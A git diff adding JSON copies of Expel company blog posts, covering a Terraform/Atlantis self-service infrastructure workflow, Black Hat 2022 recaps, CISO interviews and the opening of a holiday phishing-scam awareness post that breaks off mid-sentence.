2022 (ISC)2 Cybersecurity Workforce Study, released last October, found a global shortage of 3.4 million workers in the field \u2013 roughly equivalent to the population of Utah. With Kubernetes, the talent pool is even slimmer. 48% of respondents in a 2022 survey said the \u201clack of in-house skills and limited manpower [is] the biggest obstacle to migrating to or using Kubernetes and containers\u2026\u201d So, security operations teams are underwater. They lack the time and resources to become experts on every new attack vector. Innovation and business demands associated with a hot new technology intensify the pressure, inducing a reactive approach to everything, weakened effectiveness across the board, fatigue, burnout, and mounting risk levels. Did we miss anything? Stay tuned to this space. We have some more useful analysis of the Kubernetes market, its benefits and challenges, and maybe even some ideas to help you better implement and manage your own strategy in the coming weeks. 
In the meantime, drop us a line with any questions." +} \ No newline at end of file diff --git a/terraforming-a-better-engineering-experience-with-atlantis.json b/terraforming-a-better-engineering-experience-with-atlantis.json new file mode 100644 index 0000000000000000000000000000000000000000..7beec21c8d2ec44e28c78ebed893ab42df6b3353 --- /dev/null +++ b/terraforming-a-better-engineering-experience-with-atlantis.json @@ -0,0 +1,6 @@ +{ + "title": "Terraforming a better engineering experience with Atlantis", + "url": "https://expel.com/blog/terraforming-better-engineering-experience-with-atlantis/", + "date": "Aug 4, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Terraforming a better engineering experience with Atlantis Engineering \u00b7 8 MIN READ \u00b7 REILLY HERREWIG-POPE \u00b7 AUG 4, 2020 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / Tools Wearing the engineering cap in a cloud-native environment means living in a world that revolves around open-source tech. There\u2019s a dizzyingly vast ecosystem of powerful open source tools at our disposal, sure \u2013 but very few of them offer the ability to solve more abstract organizational challenges by themselves. When it comes to open-source tools, sometimes it\u2019s like playing a game of Tetris \u2026 you have to figure out how to use and shift those tools to wind up with a winning development approach. Mastering open source Tetris is great, but what\u2019s even more important when it comes to developing anything is to truly understand the needs of your users. And if you can figure out not just what they need but how to provide them with a platform they can use to solve their own problems \u2026 that\u2019s when things start to get really exciting. In this post, I\u2019ll talk about why we at Expel realized it was time to reevaluate how users interact with our core engineering platform, our approach to building a system that makes our users happy (with the help of Terraform and Atlantis) and walk you through a hypothetical scenario of what our new system looks like from the user\u2019s perspective. If you or your team are beginning to think about how to build a more robust Terraform execution pipeline, or you already have one and are looking at how to transform it into something more self-serviceable and palatable for end-users, then read on \u2013 this post might be for you! Core engineering platform vision At Expel, engineering is divided into feature teams. These feature teams own one or more services in their entirety. This includes developing the features, managing the CI/CD pipelines, managing the monitoring and owning the on-call rotation for their services. A site reliability engineer\u2019s (SRE) role is to provide a platform that makes doing all of this easy. In fact, the core platform should make it so easy for a feature team to self-service provisioning their own cloud infrastructure that it would be less convenient to ask someone to do it for them. Platform plight A critical step to building any feature, let alone an entire platform, is incorporating user feedback into the development process. Towards the beginning of development, our users let us know that the process for managing GCP CloudSQL instances felt tedious and obtuse. They were right \u2013 it was. While teams were given the keys to control their own destiny, they were not equipped with much tooling to help them get there. 
They were forced to internalize the Terraform DSL well enough to write their own code, manage their own statefiles, rationalize IAM policy and spend time grokking the nuances of each provider\u2019s implementation. This can feel like a lot of yak shaving when you\u2019re just looking for a darn database! And furthermore, we were seeing missed opportunities to apply SRE best-practices, patterns and guard rails to new infrastructure. For example, at Expel, SREs have developed a standard pattern for a Postgres CloudSQL slow query configuration that we think is usually a great idea to have enabled. But with our setup at the time, engineers did not have an easy way to inherit these benefits. Having users miss out on out-of-the-box database optimizations such as this would be no good! Any of this sound familiar? It was clear we needed some form of abstraction that would reduce the burden of Terraform development as well as package up SRE best practices into the code being written. We sat down to rethink our approach. Enter Atlantis and Expel modules What we knew we needed Okay, so we knew we needed to provide an easy way for engineers to manage their own cloud resources and monitors that would come with SRE\u2019s cloud expertise out of the box. So what exactly were our requirements? Consumable abstraction for users: This is the tricky one! The platform needs to be easy to use. We need some form of central abstraction so that, as a platform user, I can set up everything I need without being forced to internalize how it all works under the hood. Infrastructure-as-code: This should probably go without saying, but all infrastructure changes must be managed via Git. While the benefits of the Infrastructure-as-Code philosophy are outside the scope of this post ( though here\u2019s a great overview by Hashicorp ), it\u2019s worth calling out as a requirement. Completely automated: It\u2019s critical that automation drives all changes. Making infrastructure changes by executing code from an engineering workstation is widely discouraged for a number of reasons, including an increased attack surface, inconsistent code execution environments and lack of scalability. Auditability: We must be able to easily tie every infrastructure change to an individual user. What we chose After pulling our requirements together, this is the stack we chose to solve our problem: Terraform: We embrace Hashicorp\u2019s Terraform for defining our entire Google Cloud and Datadog footprints. Atlantis: An open source Terraform workflow tool for teams . Atlantis enables teams to manage Terraform changes in an easy and familiar way. Expel Terraform modules: An internal collection of opinionated libraries supported by SRE that packages the most common infrastructure and monitoring needs into parameterized Terraform modules . Users love them because they can hit the ground running without requiring a deep understanding of low-level cloud intricacies. SRE loves them because we can enable self-service for our users while still ensuring our expertise carries over everywhere that changes are happening \u2013 even (and especially) when we\u2019re not aware of them. GitHub: Where it all comes together. The Terraform code change management is not just tracked in GitHub, but the code execution itself is orchestrated through GitHub comments from the associated pull request (PR). Advantages and takeaways There are a host of advantages that the system provides our org. 
Here\u2019s what we love about it: Enables self-service for the most common infrastructure needs. There\u2019s no \u201cDevOps\u201d team waiting for you to throw a ticket over the wall to have your GCS bucket and service account provisioned. The process is only gated by how fast you can review and comment! No sacrifice is made to SRE best practices in exchange for the self-service model. Externalizing all of SRE\u2019s common patterns and experience into documented, easy-to-use modules ensures that SRE expertise is packaged in with service owners\u2019 deployments. Atlantis solves a common Terraform gotcha around scenarios involving multiple concurrent Terraform changes by implementing its own distributed locking mechanism. Atlantis will prevent any other proposed changes from being processed by applying its own special lock to any Terraform configuration that has an open PR against it. This allows users to work out of a branch and apply their change before it\u2019s merged to master, which protects users from having to submit multiple PRs to solve `terraform apply` failures. In order to tee up another change, an engineer must either apply and merge the pull request, close it or manually release the lock via a special UI provided by Atlantis. Crazy visibility. While Git should be the source of truth for all changes regardless of how Terraform code is applied, having all orchestration happening out in the open in the PR fosters a healthy and transparent environment. By using the GitOps approach and ensuring only machines are executing our Terraform code, we reduce our attack surface by limiting the number of credentials and privileged hosts. Putting it all together As you can probably imagine, we\u2019re always looking for new ways to enable our analysts and keep our customers safe. And since Expel\u2019s backend is built using a microservice architecture, new applications get spun up all the time. Now we\u2019re going to walk through a hypothetical end-to-end example to demonstrate how the process works as a platform user. In this scenario, we\u2019ll pretend for a moment that we\u2019re software engineers spinning up a brand new service named `super-slick-service` that will benefit from using the open source software Redis. You can almost hear the (albeit contrived) conversation from the design meeting conference room: Jim: Hey! If our new app needs Redis, I heard GCP offers a managed Redis service called Memorystore. How can we go about sprinkling some of that on our app? Ali: I think SRE provides a Terraform module that we can use to provision that. Jim: Cool, but how can our app access the instance? Do we need to ask someone to set up DNS records for it? And how can we get some viz into instance health for things such as system capacity? Ali: The module sets up everything we need, including the DNS and Datadog monitors that will alert our team if we\u2019re beginning to run into capacity issues. Just run through the doc \u2013 it should only take a few minutes. Pull up the core platform docs Okay, we know what we need to do. Now it\u2019s time to stress the importance of platform documentation! Effective tools won\u2019t do nearly as much good if it\u2019s not clear how to harness their power. Check out this README for our Memorystore Terraform module: Core platform Terraform module documentation Call the module with your desired parameters Okay, so now we\u2019ve pulled up the documentation and are going to invoke the Memorystore module and pass in just the basic bits that we need to specify.
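A minimal call might look roughly like the sketch below. Treat it as illustrative only: the module source path, project name and input names are placeholders for this example rather than the real Memorystore module interface.

```hcl
# Hypothetical sketch only: the source path, inputs and values are invented for
# illustration and do not reflect the real module.
module "super_slick_service_redis" {
  source = "git::ssh://git@github.com/example-org/terraform-modules.git//gcp/memorystore?ref=v1.2.0"

  # The "basic bits" a service team actually cares about.
  name      = "super-slick-service"
  project   = "example-gcp-project"
  region    = "us-east1"
  memory_gb = 1

  # DNS records and Datadog capacity monitors are created inside the module,
  # so callers inherit SRE's opinionated defaults without asking for them.
}
```

The design point is that a caller only touches a handful of inputs; the monitoring and DNS plumbing live inside the module.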
We\u2019re throwing the following code into our favorite IDE: Calling the Terraform Memorystore module Apply your change in GitHub via Atlantis Cool. So now we have our code and we\u2019re submitting it via pull request in GitHub. Here\u2019s where the magic happens. Submitting the pull request A GitHub pull request submission to call our Terraform module Reviewing the plan output One of the most important steps in any Terraform workflow relies on the `terraform plan` feature. The `terraform plan` provides the user a snapshot of what Terraform would do in the event that it had been executed. It displays the delta between the desired state of your infrastructure as defined by your current commit versus its actual state provided by the providers\u2019 API. This is a critical step in any Terraform workflow because while Terraform enables you to orchestrate impressive feats of progress, it in turn enables you to orchestrate impressive feats of destruction if you don\u2019t exercise great scrutiny upon your plan review. Luckily, this part is Atlantis\u2019 bread and butter. Atlantis provides a wonderfully executed mechanism to sidestep the need for platform users to set up a local Terraform toolchain: GitHub comments! It does this by leveraging webhooks to allow GitHub users to execute Terraform via comments in the GitHub pull request. As long as you\u2019re authorized to operate on your application repo, you\u2019re able to harness the power of Terraform while dodging a whole category of headache that can come in the form of cumbersome state file management , mismatching Terraform and provider versions or brittle Terraform execution pipeline builds. It\u2019s a beautiful thing! Once your PR is submitted, Atlantis will manage the `terraform plan` on your behalf and submit the output for review in comment-form. Not only does this allow the author to review the proposed changes with minimal fuss, but it cranks up the visibility for the entire team to eleven since the plan output is dropped right in the PR! Terraform plan output as commented on our GitHub pull request via Atlantis Executing the change Great. Your code and `terraform plan` changes have been reviewed by team members and have been approved. Now how to put your change into effect? Just drop a comment in GitHub with an `atlantis apply` to pull the trigger on your change! And when the `atlantis apply` step is finally complete, you can count on a neat summary dropped in as \u2013 you guessed it \u2013 another GitHub comment! Sweet, now we can merge! Terraform apply output as commented on our GitHub pull request via Atlantis You can now see all the effects of your pull request being applied. Memorystore instance We have a brand new Memorystore instance, hot off the press: GCP Cloud Console reflecting our new Memorystore instance DNS record set A DNS A record has been provisioned for the instance: GCP Cloud Console reflecting our new DNS record Datadog monitor You can see here how our Datadog monitor query has been automatically scoped to our new instance ID: Datadog web console reflecting our new capacity monitor Measuring platform use Another important aspect to platform engineering is measuring user engagement. We want the platform to emit usage metrics wherever possible to help SREs understand how and when the platform is being used. In this case, we bake some telemetry into our modules by using local-exec provisioners that run from the Atlantis pod when modules are being invoked. 
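As a rough sketch of that idea (not the actual implementation), a module could wrap a counter around each invocation like this. It assumes a DogStatsD agent is listening on 127.0.0.1:8125 in the pod that runs Terraform, and the metric name and tag are placeholders:

```hcl
# Minimal sketch of invocation telemetry via a local-exec provisioner.
# Assumes a DogStatsD agent is reachable at 127.0.0.1:8125 from the pod that
# runs Terraform; the metric name and tag below are illustrative only.
resource "null_resource" "module_invocation_telemetry" {
  # timestamp() changes on every run, so the provisioner fires on each apply.
  triggers = {
    always_run = timestamp()
  }

  provisioner "local-exec" {
    interpreter = ["/bin/bash", "-c"]
    command     = "echo -n 'platform.module.invoked:1|c|#module:memorystore' > /dev/udp/127.0.0.1/8125"
  }
}
```

Emitting the counter at apply time, from the same place the code runs, is what makes it possible to chart module usage over time.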
Having this in place lets us look back in time to make more informed, data-driven decisions. Datadog web console reflecting module invocations over the past week Parting thoughts Delivering a useful platform can be challenging. If we\u2019re steadfast in our commitment to remain engaged with our users as well as continuing to view technologies not as one-size-fits-all solutions, but as discrete tools meant to be assembled to create a powerful experience, we set ourselves up to build a successful platform that our users look forward to using. Want to find out more? Luke Jolly has kindly given back to the Atlantis community via the Atlantis contribution. You can see the conversation here . If you have any further questions, feel free to reach out to us !" +} \ No newline at end of file diff --git a/that-s-a-wrap-top-3-takeaways-from-black-hat.json b/that-s-a-wrap-top-3-takeaways-from-black-hat.json new file mode 100644 index 0000000000000000000000000000000000000000..4de41279f40be0d1360a478e7e43cfc6a825278d --- /dev/null +++ b/that-s-a-wrap-top-3-takeaways-from-black-hat.json @@ -0,0 +1,6 @@ +{ + "title": "That's a wrap! Top 3 takeaways from Black Hat", + "url": "https://expel.com/blog/top-3-takeaways-from-black-hat-2022/", + "date": "Aug 18, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG That\u2019s a wrap! Top 3 takeaways from Black Hat Expel insider \u00b7 3 MIN READ \u00b7 KELLY FIEDLER \u00b7 AUG 18, 2022 \u00b7 TAGS: Cloud security / Company news / MDR Even with Vegas in the rearview mirror, we\u2019re still reeling from the excitement of our first time exhibiting at Black Hat USA. Mandalay Bay buzzed with the energy of a community nostalgic for its days at summer camp\u2014Hacker Summer Camp, that is. This year\u2019s event felt especially energized with more people, exhibitors, and fun. Our friendly bots, Josie\u2122 and Ruxie\u2122, joined us on the showfloor (plushies, anyone?), and we chatted with friends old and new about our approach to security. Then, through lots and lots of demos, we showed why we believe security can even be delightful. Now that the dust has settled and our suitcases are (mostly) unpacked, here are some of our big takeaways. 1. Having your head in the clouds might not be such a bad thing\u2026 Cloud security continues to gain momentum as a hot conference topic across the industry\u2014and for good reason. In his keynote address, Chris Krebs of the Krebs Stamos Group, and former director of the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA), touched on the increasingly complex issue. He argued the pandemic drove an accelerated move to cloud infrastructures, creating larger ecosystems where productivity and ease tend to win over security. Cybercriminals understand this shift, so defenders must be ready. It\u2019s part of the reason we just released this handy guide to mapping the MITRE ATT&CK Framework to Google Cloud Platform (GCP). We\u2019re sharing the lessons we\u2019ve learned through our own investigations to help you and your team tackle GCP incident investigations\u2014so we can take on the cloud, together. (And if you\u2019re operating in Amazon Web Services (AWS) or Azure, don\u2019t sweat it\u2014we\u2019ve got you covered with our AWS Mind Map and Azure Guidebook .) 2. (Cyber) history repeats itself\u2014it\u2019s up to us to look for the signs. Kim Zetter, author and investigative journalist, reminded us that we\u2019ve seen a lot of the same warning signs about cyber risk before. 
According to Zetter, the 2010 discovery of Stuxnet triggered a shift in cybercrime\u2014opening the eyes of the community to the link between cybersecurity and national security. But despite the incredible advancements the industry has made since Stuxnet, many organizations still suffer from major, preventable incidents because they didn\u2019t heed the warning signs. At Expel, we\u2019ve also seen this pattern of attackers relying on tried-and-true techniques across our customer base. Our recent research revealed a shift in pre-ransomware activity , as attackers opted for older techniques to combat new changes by Microsoft (more on this in our Expel Quarterly Threat Report ). We\u2019re seeing threat actors continue to use old techniques instead of adopting new ones. Why? Because it works. But there\u2019s a silver lining: if we continue information sharing across the growing community of cybersecurity defenders, then we have a better chance at seeing the writing on the wall and identifying signs of potential threats before they cause harm. (Hint: this is the goal behind our quarterly threat reports.) 3. It\u2019s going to take a village. Community reigned as the overarching theme of the week. This thread ran through keynotes and briefings alike, as this tight-knit community of defenders steadily grows alongside the threats we face. We heard from industry icons, including Jeff Moss, the founder of Black Hat himself, about the new team emerging when it comes to cybersecurity: the community of people using their roles in cybersecurity to improve the world. Moss noted that businesses responding to the Russian invasion of Ukraine demonstrated the cybersecurity industry\u2019s significant influence in the world, as some companies turned off access to their services or shut down their websites. The point? We\u2019re part of an influential community with the power to do some good in the world\u2014but it\u2019s going to take us working together to get there. Now that it\u2019s all said and done, we\u2019re already counting down the days until it\u2019s time to pack our bags and head back to camp! Ahead of the show, we shared the product advancements , resources, and capabilities we\u2019ve been hard at work on, and we can\u2019t wait to keep the excitement rolling. Want to know more about how we do what we do? Reach out anytime ." +} \ No newline at end of file diff --git a/the-ciso-in-2020-and-beyond-a-chat-with-bruce-potter.json b/the-ciso-in-2020-and-beyond-a-chat-with-bruce-potter.json new file mode 100644 index 0000000000000000000000000000000000000000..0f1d3e7ab20abcfd71b286cc573cfa813f98f276 --- /dev/null +++ b/the-ciso-in-2020-and-beyond-a-chat-with-bruce-potter.json @@ -0,0 +1,6 @@ +{ + "title": "The CISO in 2020 (and beyond): A chat with Bruce Potter", + "url": "https://expel.com/blog/ciso-in-2020-and-beyond-chat-with-bruce-potter/", + "date": "Nov 23, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG The CISO in 2020 (and beyond): A chat with Bruce Potter Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 NOV 23, 2020 \u00b7 TAGS: CISO / MDR / Tech tools You\u2019ve probably run into a few headlines declaring that 2020 saw \u201cthe rise of the CISO.\u201d Well, we agree. This year required all of us to step up to the plate and step outside of ourselves to meet completely unexpected and phenomenal challenges (we\u2019re on a hiatus from using \u201cunprecedented\u201d). 
And in the tech world, we saw the role of the CISO evolve \u2013 pushing a member of the C-suite who\u2019s used to working behind the scenes to being front and center. Now that we\u2019re finally reaching the end of 2020, we\u2019re taking a moment to look back. So, I sat down (virtually) with Expel\u2019s CISO, Bruce Potter, to reflect on this year \u2013 how we overcame the challenges it presented and what anyone in security should be thinking about as we enter a post-2020 world. There are many things that won\u2019t go back to being the way they were before 2020. Do you think the role of the CISO is one of those things? Yes. I think that coming out of 2020, CISOs will have a more central role in businesses. CISO\u2019s have been front and center in many organizations\u2019 pandemic response. The ability to meet risk objectives while working remotely is the only way most businesses can continue to operate. And in the case of the CISO, that meant many of them had to complete remote work projects in days that would have otherwise taken years. The success of a company\u2019s remote work strategy is in large thanks to the work of the CISO. During my time as a CISO, I\u2019ve learned to focus more on rapid understanding of a problem and leveraging experts to get a solution out fast we can iterate on. It gets us better near term defenses and in the long run is less resource intensive. This is something every CISO needed to quickly master this year. I think security really is an enabler during COVID and many executives see that a good CISO can be a differentiator, not just something required for regulatory purposes. I expect CISOs to be elevated in org charts and be responsible for broader swaths of risk, not just cyber. Everyone wants to know \u2013 what are the biggest security threats we should be aware of? Social engineering. Far and away, that\u2019s what takes down companies. From the latest Twitter hack to some of the earliest attacks on the Internet, social engineering is still the number one way companies get compromised. Combined with ransomware tooling, the impact can be devastating. We\u2019re a long way off from solving this issue as we generally have poor authorization schemes in our organizations. Users tend to have far more access to data and systems than they need, but solutions to help with that are few and far between. It\u2019s clear that orgs can\u2019t get away with not taking security seriously. What did you include in your 2021 planning? We\u2019re focusing on three major areas for 2021: 1. Product and software security. Looking beyond the security of your enterprise and focusing on the security of the services and products you are developing is an important part of the overall security of an organization, but sometimes it falls outside the scope of the CISO\u2019s role. In our case, it\u2019s squarely my responsibility and it\u2019s a huge focus for us in 2021. 2. Formalized risk management. Paying attention to security tech is only one part of a functional security program. Having formalized processes around security and privacy risk management is a function that is often more \u201cseat of the pants\u201d than a formalized thing. We\u2019re working to codify our risk management processes to make our risk management a more repeatable and efficient process. One thing we\u2019ll continue to do here: Not rely on vendors to tell you what questions to ask when it comes to assessing third-party risk. 
We\u2019ve developed our own third-party questionnaire and narrowed it down to 10 (what we think are really good) questions. 3. Cloud authorization. We\u2019re cloud native so it means we\u2019re all cloud all the time\u2026 and as much as we have single sign-on (SSO) \u2013 we don\u2019t have centralized, fine-grained access control to cloud services. We have to configure authorization for each service, which doesn\u2019t scale (obviously). It\u2019s time to fix it. Expel recently gained ISO/IEC 27001:2013 certification and integrated the ISO/IEC 27701:2019 extension to our certification. Does this mean that all orgs should do this? The simple answer is \u201cmaybe.\u201d It depends on whether your customers care about how secure you are. The answer for a law firm (as an example) vs. a SaaS provider is probably very different. When you\u2019re providing online services, you need to be able to express to your customers, in a very believable way: \u201cWe know what we\u2019re doing from a security perspective.\u201d There\u2019s a lot that goes into that, including transparency in operations, having good processes and procedures and having an architecture that lends itself to securely handling customer data. ISO27001 and ISO27701 are great certifications that can help you demonstrate this to customers. While certifications aren\u2019t the be-all-end-all when it comes to building trust, they\u2019re a fantastic starting point. Looking back at the dumpster fire that is 2020 \u2013 are there any lessons that you couldn\u2019t anticipate needing to learn but you will now keep in your toolbox moving forward? I couldn\u2019t anticipate that one day I\u2019d need to get every single member of my company working fully remote within a 72-hour timeframe. We ended up spending a lot of the year being concerned about our employees, their welfare and the quality and security of their home networks. Being successful in 2020 required having a very personal touch and view of our security controls. I think keeping that customer focus going forward will allow us to have low-friction security solutions that people don\u2019t work around or ignore. It\u2019s safe to say that CISOs were in pretty high demand when it came to interviews. Is there a question you wish someone asked you this year but didn\u2019t? How have productivity and innovation been impacted by working from home? It may seem like a CIO or COO type question, but I think security has a big impact on this as well. The security controls in place when collaborating in person (say in a conference room) vs. remotely (Zoom? Slack? Virtual whiteboard?) are very different. Ensuring that your security program is not getting in the way of collaboration and productivity is very important. Ideally, your security program enables collaboration and productivity. Ensuring your actions as a CISO are aligned to the business needs, not just business security needs, can be a real differentiator this year. Let\u2019s hear it for the CISOs! Seriously, thank you. To say that working through this year wasn\u2019t easy is an egregious understatement. We\u2019re appreciative of Bruce \u2013 and our entire Expel team \u2013 for never skipping a beat when it comes to keeping our customers and our Expletives safe. We hope these insights are helpful to you as you complete your 2021 planning. Do you have any burning questions that we didn\u2019t cover? We\u2019d love to hear them!"
+} \ No newline at end of file diff --git a/the-cycle-continues-black-hat-usa-2022-day-2-recap.json b/the-cycle-continues-black-hat-usa-2022-day-2-recap.json new file mode 100644 index 0000000000000000000000000000000000000000..92dd06225bbe571ab81e6567a82a6123815c5668 --- /dev/null +++ b/the-cycle-continues-black-hat-usa-2022-day-2-recap.json @@ -0,0 +1,6 @@ +{ + "title": "The Cycle Continues: Black Hat USA 2022 \u2014 Day 2 Recap", + "url": "https://expel.com/blog/black-hat-usa-2022-day-2-recap/", + "date": "Aug 12, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG The Cycle Continues: Black Hat USA 2022 \u2014 Day 2 Recap Expel insider \u00b7 3 MIN READ \u00b7 ANDY RODGER \u00b7 AUG 12, 2022 \u00b7 TAGS: Company news Black Hat USA 2022 has officially wrapped, and the attendees will soon leave the heat of Las Vegas behind to go back to their organizations with some fresh perspectives on fighting the good fight. The day 1 theme of community was prevalent from the get-go again today, starting with the keynote address. Once again, Jeff Moss kicked things off, addressing the evolving relationship the Black Hat community has with the media. Moss pointed out that Black Hat has always been about bringing new voices to the infosec community and that includes the press. Unfortunately, the press hasn\u2019t always been so kind to the group, resulting in a love/hate relationship. Like any organization, Moss pointed out, a good media interview can result in showcasing the community\u2019s great work and educating the public about cybersecurity topics, while a bad interview can cast its work in a negative light or perpetuate the \u201ccriminal\u201d hacker stereotype. Thankfully, as cybersecurity issues have become more mainstream, the community\u2019s relationship with the press has evolved in a positive way. Moss then welcomed to the stage, Kim Zetter, an author and investigative journalist with an impressive r\u00e9sum\u00e9 that includes cybersecurity writing roles at WIRED, the New York Times Magazine, the Washington Post, Yahoo! News, Vice Magazine, and more. One would be hard-pressed to find a more appropriate journalist to address the Black Hat crowd. Zetter explained that in the beginning of her career, cybersecurity reporters almost exclusively worked for tech press. The mainstream media would assign a general reporter to the story only when a major incident occurred. Over the last 10 years or so, the major news outlets woke up and realized the importance of hiring reporters to translate security to the general public. Zetter\u2019s presentation, titled \u201cPre-Stuxnet, Post-Stuxnet: Everything Has Changed, Nothing Has Changed,\u201d examined decades of cybersecurity developments, including the lead-up to the Stuxnet discovery in 2010. That discovery opened the eyes of the security community to a sector it previously ignored: the operational networks and industrial control systems that manage critical infrastructure. This was when cybersecurity became linked to national security. Since Stuxnet, the cybersecurity industry has made tremendous strides. Security technology is far more advanced than in 2010, and despite all their work, organizations still suffer from incidents that have major consequences\u2014-and that were totally predictable (we might even say preventable). Zetter explained that organizations will always experience incidents that no one saw coming, but they could foreshadow more incidents before they occur. 
So while it\u2019s important that we look back at the history of watershed cybersecurity events, we must also watch for the signs of what\u2019s to come\u2014and take the proper precautions to prepare now. This sentiment was present\u2014albeit to a lesser degree\u2014in the session by Nathan Hamiel titled, \u201cFrom Hackathon to Hacked!: Web3\u2019s Security Journey.\u201d This presentation examined the security maturity of Web3 projects, built on blockchain technology. While the tech community recognizes the term \u201cWeb3,\u201d it\u2019s still an emerging technology with some kinks to work out. When combined with the fact that small teams, with no security systems or safeguards in place, run many of the Web3 projects, these projects become juicy targets for cyber criminals. Even though Web3 is still such a nascent space, it faces a lot of the same challenges as the nation\u2019s critical infrastructure. There are basic security best practices that both areas still don\u2019t follow. And this is true across the business landscape. At Expel, we often see companies not applying patches, or lacking simple email filters to reduce phishing attempts, or misconfiguring their cloud settings. So what should we as an industry do? It comes back to community. We should heed the advice of Kim Zetter, and pay close attention to the warnings of impending vulnerabilities and ransomware attacks to sense what\u2019s coming, and take the appropriate steps to prepare. Security challenges are only increasing in sophistication and frequency, and we can\u2019t wait for major incidents to happen before dealing with them. While this all sounds very dire, if Black Hat USA 2022 showed anything, it\u2019s that this community is able to meet these challenges head on, and usher in a new age of security." +} \ No newline at end of file diff --git a/the-dinner-that-started-it-all-with-expel-s-new-ciso.json b/the-dinner-that-started-it-all-with-expel-s-new-ciso.json new file mode 100644 index 0000000000000000000000000000000000000000..0f72c9569b14be13127458139ad7f5ba331292b9 --- /dev/null +++ b/the-dinner-that-started-it-all-with-expel-s-new-ciso.json @@ -0,0 +1,6 @@ +{ + "title": "The dinner that started it all with Expel's new CISO", + "url": "https://expel.com/blog/the-dinner-that-started-it-all-with-expels-new-ciso/", + "date": "Apr 12, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG The dinner that started it all with Expel\u2019s new CISO Talent \u00b7 3 MIN READ \u00b7 GREG NOTCH \u00b7 APR 12, 2022 \u00b7 TAGS: Company news Expel recently welcomed a new face to the executive team with the addition of Greg Notch as Chief Information Security Officer (CISO). Fresh off of 15 years as CISO and Senior Vice President of Technology at the National Hockey League (NHL), Greg has been in the security and tech biz for over 20 years \u2014 helping companies large and small through all three dot-com booms. As Expel\u2019s CISO, he ensures the security of our systems, and keeps customers educated on the threat landscape and latest techniques for mitigating risk in their environments. In this post, get to know Greg and what drew him to Expel, in his own words. The dilemma A little over five years ago, my company tasked me with building our information security program. As I sat in my office, I faced a seemingly impossible problem: the current approach to info security programs involved solving several complex problems simultaneously. 
Conventional thinking for an enterprise security program said you first had to buy a bunch of security tools and gather logs from the tools and the rest of your environment. Then you bought a security information and event management (SIEM) tool and jammed in all that data. Next, you hired and staffed a security operations center (SOC) team to sift through the data and respond to what they found. Honestly, that sounded terrible. This \u201csolution\u201d created two other problems to solve: how to manage all those tools and data, and how to staff the organization that would deliver actions and outcomes from the pile of data. Both are difficult, but building a SOC with the expertise and experience necessary to handle it can be especially daunting. Not to mention, if you wanted it to be a 24\u00d77 operation, it involved hiring somewhere between eight and 12 people. The only obvious alternative was to outsource this entirely to a company that would make all the technical and staffing decisions for you. But the players in the market at the time weren\u2019t making decisions based on individual customer needs; they were focused on what was economical for them to provide as a service. After several conversations with peers who used these services, it appeared that none of those services took any context from the customer, which meant endless reams of meaningless alerts from your own tools \u2014 usually at a substantial cost. Spoiler alert: None of these options sounded appealing. I\u2019d worked with venture-backed businesses previously, so this gap in the market seemed to me like a good opportunity to reach out to my venture capitalist (VC) friends for advice. In my experience, venture-backed businesses are a successful way to solve problems the market isn\u2019t adequately addressing. When successful, this approach has the added virtue of being to everyone\u2019s benefit (my security program, the company, and the venture backers). I began expressing my exasperation to VC folks, explaining that there must be a better way and asking, \u201cWhy isn\u2019t there a platform to solve this problem at scale?\u201d Most responded that it was an industry-wide dilemma, and that it likely wasn\u2019t solvable \u2014 at least not with software. The path to Expel Somewhat dejected but undeterred, I headed off to D.C. for a security conference. There, one of my VC friends set up a meeting with \u201cfolks who may be trying to solve that problem you keep pestering us about.\u201d Intrigued, I met Expel\u2019s co-founders Yanek, Merk, and Justin for dinner and the rest is, well, the stuff of legends. They saw the same problem and had a compelling plan for how to solve it. At the end of the meal, I remember asking them: \u201cSo\u2026 when can you start?\u201d To which they responded, \u201cWe should probably set up a company first.\u201d That company was, of course, Expel. Since then, I\u2019ve watched as they built an amazing team and company, founded on core values and a culture that I didn\u2019t think was possible. They delivered on every commitment, big or small, and every interaction I had with the Expel team was thoughtful, humble, and relentlessly customer-driven. The values permeated the entire company, and I saw that it was the sort of place where anyone would be lucky to work. Now I have the distinct privilege of joining that team, and becoming an Expletive. I\u2019m looking forward to continuing the journey." 
+} \ No newline at end of file diff --git a/the-grinchy-email-scams-to-watch-out-for-this-holiday-season.json b/the-grinchy-email-scams-to-watch-out-for-this-holiday-season.json new file mode 100644 index 0000000000000000000000000000000000000000..8d71f2c08a63f16b7830e27ccfc0d23c4d9963d5 --- /dev/null +++ b/the-grinchy-email-scams-to-watch-out-for-this-holiday-season.json @@ -0,0 +1,6 @@ +{ + "title": "The Grinchy email scams to watch out for this holiday season", + "url": "https://expel.com/blog/the-grinchy-email-scams-to-watch-out-for-this-holiday-season/", + "date": "Nov 22, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG The Grinchy email scams to watch out for this holiday season Security operations \u00b7 9 MIN READ \u00b7 RAY PUGH \u00b7 NOV 22, 2021 \u00b7 TAGS: MDR As the holidays near, there\u2019s so much to excite! It\u2019s that time of year, with sales left and right. Cheer fills the air and there\u2019s no time to wait For holiday shopping \u2013 don\u2019t want to be late! But as you shop online and check email this season, Watch out for these scams \u2013 with very good reason. With celebrations and work and no spare time to mention, Don\u2019t let Grinches in while not paying attention. They want to steal info and data galore, Gift cards, credentials, and so much more. So here\u2019s what to know to avoid falling prey \u2014 Keep your inbox secure through these holidays. Who ordered all that Who Hash ?!?! Aka: Fake shipping notifications Our security operations center (SOC) saw several of these scams, and we expect them to ramp up around the holidays. Holiday Grinches (aka attackers) send fake shipping notifications, often posing as legitimate retailers, hoping to trick recipients into providing personal information like card numbers, login credentials, or other details. For example, we investigated this fake Amazon notification earlier this year, which claimed an order was on its way to the recipient. Fake Amazon shipping notification email The attacker\u2019s goal is to make the recipient think this is an actual order incorrectly placed through their account (or that maybe their account was hacked), with the large dollar amount (over $1,400 in this case) causing concern that the recipient will be stuck with the bill for an item they didn\u2019t order. There are no clickable links in the email, which steers the reader to the Support Desk phone number listed in bright red at the bottom. Our Grinchy sender hopes recipients will call that number to dispute the order, then poses as customer service on the phone to ask for \u201cnecessary account information\u201d to help the recipient sort out the issue. If successful, this type of scam would result in the attacker obtaining account credentials, credit card numbers, or other sensitive personal information from the concerned recipient. These fake shipping notices are a common attacker 